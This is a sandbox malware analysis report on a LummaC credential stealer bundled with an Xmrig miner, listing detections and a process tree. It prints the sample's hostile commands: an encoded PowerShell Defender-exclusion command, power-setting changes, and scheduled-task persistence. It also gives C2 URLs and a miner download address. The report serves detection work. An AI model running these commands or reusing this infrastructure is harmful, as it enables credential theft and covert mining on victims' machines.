Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setupx 1.exe1.exe

Overview

General Information

Sample name:setupx 1.exe1.exe
Analysis ID:1637273
MD5:d3dfeb11e332ea228567f9f4ebafef51
SHA1:86ab8368a72f9490c175de5032c2b9f2a219f0ee
SHA256:79188b44c38f4fabdb8868d0fad3ba1b297b627e8a7d2438fcf7edbaf4c2a6c8
Tags:exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • setupx 1.exe1.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\setupx 1.exe1.exe" MD5: D3DFEB11E332EA228567F9F4EBAFEF51)
    • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • setupx 1.exe1.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\setupx 1.exe1.exe" MD5: D3DFEB11E332EA228567F9F4EBAFEF51)
      • ZHKYZWVTC38PGAWGZF49K.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)
        • cmd.exe (PID: 516 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6044 cmdline: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 5128 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powercfg.exe (PID: 7188 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 7204 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 7220 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 7236 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 7252 cmdline: powercfg /hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • cmd.exe (PID: 7408 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7520 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7416 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7512 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • WerFault.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f4134320f76ad00884e54d36efdebfe68c886445f3e82d0949"}
SourceRuleDescriptionAuthorStrings
00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1082401555.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            2.2.setupx 1.exe1.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.setupx 1.exe1.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                10.2.ZHKYZWVTC38PGAWGZF49K.exe.3078c0d.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ProcessId: 7100, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe", ParentImage: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ParentProcessId: 7100, ParentProcessName: ZHKYZWVTC38PGAWGZF49K.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 516, ProcessName: cmd.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , ProcessId: 6044, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" , ProcessId: 6044, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe", ParentImage: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe, ParentProcessId: 7100, ParentProcessName: ZHKYZWVTC38PGAWGZF49K.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7408, ProcessName: cmd.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T13:33:37.859535+010020283713Unknown Traffic192.168.2.849682188.114.97.3443TCP
                  2025-03-13T13:33:40.505685+010020283713Unknown Traffic192.168.2.849684188.114.97.3443TCP
                  2025-03-13T13:33:42.699100+010020283713Unknown Traffic192.168.2.849688188.114.97.3443TCP
                  2025-03-13T13:33:45.501672+010020283713Unknown Traffic192.168.2.849690188.114.97.3443TCP
                  2025-03-13T13:33:48.410028+010020283713Unknown Traffic192.168.2.849691188.114.97.3443TCP
                  2025-03-13T13:33:50.933221+010020283713Unknown Traffic192.168.2.849692188.114.97.3443TCP
                  2025-03-13T13:33:55.415611+010020283713Unknown Traffic192.168.2.849694188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T13:34:03.475012+010028290562Crypto Currency Mining Activity Detected192.168.2.849701185.215.113.5180TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: setupx 1.exe1.exeAvira: detected
                  Source: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exeAvira URL Cloud: Label: malware
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f4134320f76ad00884e54d36efdebfe68c886445f3e82d0949"}
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeReversingLabs: Detection: 81%
                  Source: setupx 1.exe1.exeVirustotal: Detection: 65%Perma Link
                  Source: setupx 1.exe1.exeReversingLabs: Detection: 65%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: citydisco.bet/gdJIS
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                  Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,2_2_0041BAC1

                  Bitcoin Miner

                  barindex
                  Source: Yara matchFile source: 10.2.ZHKYZWVTC38PGAWGZF49K.exe.3078c0d.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ZHKYZWVTC38PGAWGZF49K.exe PID: 7100, type: MEMORYSTR
                  Source: setupx 1.exe1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2
                  Source: setupx 1.exe1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CFFCDE FindFirstFileExW,0_2_00CFFCDE
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CFFD8F
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CFFCDE FindFirstFileExW,2_2_00CFFCDE
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00CFFD8F
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]2_2_00442800
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh]2_2_0040D830
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-30h]2_2_004490C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edi, byte ptr [ebx+ecx]2_2_0044816C
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov dword ptr [esp], eax2_2_00410993
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h]2_2_0041BAC1
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch]2_2_0041BAC1
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp+02h]2_2_00429460
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_00448CC3
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then lea edi, dword ptr [eax-0000008Ah]2_2_0044BCE0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h2_2_0044AE40
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then push edi2_2_00411E2A
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]2_2_00420EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah]2_2_00420EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h2_2_00420EA0
